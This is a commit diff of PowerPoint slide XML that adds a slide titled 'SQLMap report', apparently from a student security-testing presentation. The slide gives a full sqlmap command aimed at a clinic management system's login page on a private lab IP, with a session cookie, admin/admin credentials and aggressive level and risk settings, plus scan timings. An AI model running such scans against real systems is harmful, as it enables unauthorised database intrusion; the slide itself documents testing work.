<commit_message>
SQL map slide added
</commit_message>
<xml_diff>
--- a/Presentation Slides/Presentation Slide.pptx
+++ b/Presentation Slides/Presentation Slide.pptx
@@ -12,6 +12,7 @@
     <p:sldId id="261" r:id="rId6"/>
     <p:sldId id="262" r:id="rId7"/>
     <p:sldId id="263" r:id="rId8"/>
+    <p:sldId id="264" r:id="rId9"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -110,6 +111,11 @@
       </a:defRPr>
     </a:lvl9pPr>
   </p:defaultTextStyle>
+  <p:extLst>
+    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/>
+    </p:ext>
+  </p:extLst>
 </p:presentation>
 </file>
 
@@ -5230,6 +5236,235 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735979F9-1635-4730-AF58-2D0FD3B2447D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231135" y="143598"/>
+            <a:ext cx="7729728" cy="640173"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>SQLMap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> report</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Content Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4F219B-F14B-4E42-8E67-2D428C9998F5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="196637" y="1620407"/>
+            <a:ext cx="4068996" cy="4732670"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>sudo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>sqlmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> -u 192.168.0.61/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>ocms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>index.php?signIn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=1 -crawl=3 --</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>dbms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> --cookie=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>online_clinic_management_system</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=hl6aaf2t1hc2i6runicnmscrmn --</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>dbs</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> --data="user=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>admin&amp;password</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=admin" --level=5 --risk=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Scan Started at 22:08 16-04-2020 EST</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Scan Ended at 10:32 17-04-2020 EST</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Total Time - 12 hours 24 mins </a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0BDC778-9854-4857-8EDC-891BF6B80134}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill rotWithShape="1">
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect l="295" t="10377" r="-295" b="-10377"/>
+          <a:stretch/>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4265635" y="1143466"/>
+            <a:ext cx="7729728" cy="5996940"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3830457467"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
 <a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Parcel">
   <a:themeElements>

</xml_diff>